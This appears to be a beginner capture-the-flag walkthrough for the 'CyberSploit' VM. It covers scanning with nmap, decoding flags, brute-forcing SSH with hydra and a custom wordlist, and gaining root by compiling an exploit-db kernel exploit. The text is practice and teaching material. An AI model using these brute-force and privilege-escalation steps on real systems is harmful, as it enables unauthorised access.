Description
THIS IS A MACHINE FOR COMPLETE BEGINNER , THERE ARE THREE FALGS AVAILABLE IN THIS VM.
FROM THIS VMs YOU WILL LEARN ABOUT ENCODER-DECODER & EXPLOIT-DB.
netdiscover
192.168.0.42
nmap
nmap -sV -p- 192.168.0.42
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))port 80
robots.txt
R29vZCBXb3JrICEKRmxhZzE6IGN5YmVyc3Bsb2l0e3lvdXR1YmUuY29tL2MvY3liZXJzcGxvaXR9
I think it’s base64.
➜ ~ echo R29vZCBXb3JrICEKRmxhZzE6IGN5YmVyc3Bsb2l0e3lvdXR1YmUuY29tL2MvY3liZXJzcGxvaXR9 | base64 --decode
Good Work !
Flag1: cybersploit{youtube.com/c/cybersploit}% Source code
<!-------------username:itsskv--------------------->Gif
In the gif we have this code.
I don’t know what to do with it.
It’s not in hexadecimal because there is a P and S.
B2C B2B PSD RGBPort 22
I did a wordlist with the words in the gif and the website.
https://weakpass.com/generate
Seriously:
And th password was the flag.
hydra -l itsskv -P cyberwordlist -s 22 -f 192.168.0.42 ssh
[22][ssh] host: 192.168.0.42 login: itsskv password: cybersploit{youtube.com/c/cybersploit}flag2.txt
itsskv@cybersploit-CTF:~$ ls
Desktop Downloads flag2.txt Pictures Templates
Documents examples.desktop Music Public Videos
itsskv@cybersploit-CTF:~$ cat flag2.txt
01100111 01101111 01101111 01100100 00100000 01110111 01101111 01110010 01101011 00100000 00100001 00001010 01100110 01101100 01100001 01100111 00110010 00111010 00100000 01100011 01111001 01100010 01100101 01110010 01110011 01110000 01101100 01101111 01101001 01110100 01111011 01101000 01110100 01110100 01110000 01110011 00111010 01110100 00101110 01101101 01100101 00101111 01100011 01111001 01100010 01100101 01110010 01110011 01110000 01101100 01101111 01101001 01110100 00110001 01111101
good work !
flag2: cybersploit{https:t.me/cybersploit1}LSE.sh
Hostname: cybersploit-CTF
Linux: 3.13.0-32-generic
Distribution: Ubuntu 12.04.5 LTS
Architecture: i686
============================================================( file system )=====
[!] fst020 Uncommon setuid binaries........................................ yes!
---
/usr/bin/X
/usr/bin/lppasswd
---
[*] fst080 Can we read subdirectories under /home?......................... yes!
[*] fst100 Useful binaries................................................. yes!I have one thing interestion, the ubuntu version.
Exploit
https://www.exploit-db.com/exploits/37292
I can’t download andd vi crash when I use it, that’s why I use nano.
itsskv@cybersploit-CTF:~$ touch exp.c
itsskv@cybersploit-CTF:~$
itsskv@cybersploit-CTF:~$ nano exp.c
itsskv@cybersploit-CTF:~$ gcc exp.c -o exp
itsskv@cybersploit-CTF:~$ ./exp
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
uid=0(root) gid=0(root) groups=0(root),1001(itsskv)finalflag.txt
root@cybersploit-CTF:/home/itsskv# cat /root/finalflag.txt
______ ____ ____ .______ _______ .______ _______..______ __ ______ __ .___________.
/ |\ \ / / | _ \ | ____|| _ \ / || _ \ | | / __ \ | | | |
| ,----' \ \/ / | |_) | | |__ | |_) | | (----`| |_) | | | | | | | | | `---| |----`
| | \_ _/ | _ < | __| | / \ \ | ___/ | | | | | | | | | |
| `----. | | | |_) | | |____ | |\ \----.----) | | | | `----.| `--' | | | | |
\______| |__| |______/ |_______|| _| `._____|_______/ | _| |_______| \______/ |__| |__|
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _
/ \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \
( c | o | n | g | r | a | t | u | l | a | t | i | o | n | s )
\_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/
flag3: cybersploit{Z3X21CW42C4 many many congratulations !}
if you like it share with me https://twitter.com/cybersploit1.
Thanks !